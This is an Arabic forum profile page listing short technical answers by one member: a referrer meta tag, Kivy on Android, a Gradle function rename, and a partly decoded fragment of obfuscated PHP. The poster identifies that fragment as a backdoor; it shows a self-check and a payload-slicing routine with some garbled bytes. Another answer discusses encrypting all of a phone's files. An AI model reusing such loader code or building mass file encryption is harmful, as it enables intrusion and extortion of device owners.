اذهب إلى المحتوى

Nour Abdou

الأعضاء
  • المساهمات

    5
  • تاريخ الانضمام

  • تاريخ آخر زيارة

كل منشورات العضو Nour Abdou

  1. <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer"> تاج الميتا يضع فى الheaders الخاصة بالموقع كالتالى Referrer-Policy: origin-when-cross-origin وهي سياسة التحويل
  2. من خلال كايفي Kivy هي مكتبة بايثون مفتوحة المصدر لتطوير تطبيقات المحمول وغيرها من تطبيقات اللمس المتعدد مع واجهة مستخدم طبيعية. يمكن تشغيلها على أنظمة الأندرويد . لكن عند تشغيل التطبيق والبدأ فى عملية تشفير الملفات على الاندرويد ستحتاج إلى صلاحيات root لتتمكن من تشفير كل ملفات الهاتف. وهذا صعب الحدوث.
  3. قم بتغير الدالة variant.getPackageLibrary() الى variant.getPackageLibraryProvider()
  4. اعتقد أنك لم تنسخ الكود بشكل كامل جرب أن تقوم بإلصاقه في pastebin ثم تضع الرابط هنا على أي حال هذا جزء من الكود بعد فك شفرته $I11llII111=file(preg_replace("@\(.*\(.*$@","",__FILE__)); if(preg_replace("@\(.*\(.*$@","",__FILE__)==__FILE__ or preg_replace("@\(.*\(.*$@","",__LINE__) != 3)die("<tt>ERROR");zm�^r^function O0O00OOO00($a,$b){$c=array(909,318,128,2588);if($b==194){$d=substr($a,$c[0]+$c[1],$c[2]);}elseif($b==148){$d=substr($a,$c[0],$c[1]);}elseif($b==124){$d=trim(substr($a,$c[0]+$c[1]+$c[2]));}return$d;} وهو backdoor بلغة php.
×
×
  • أضف...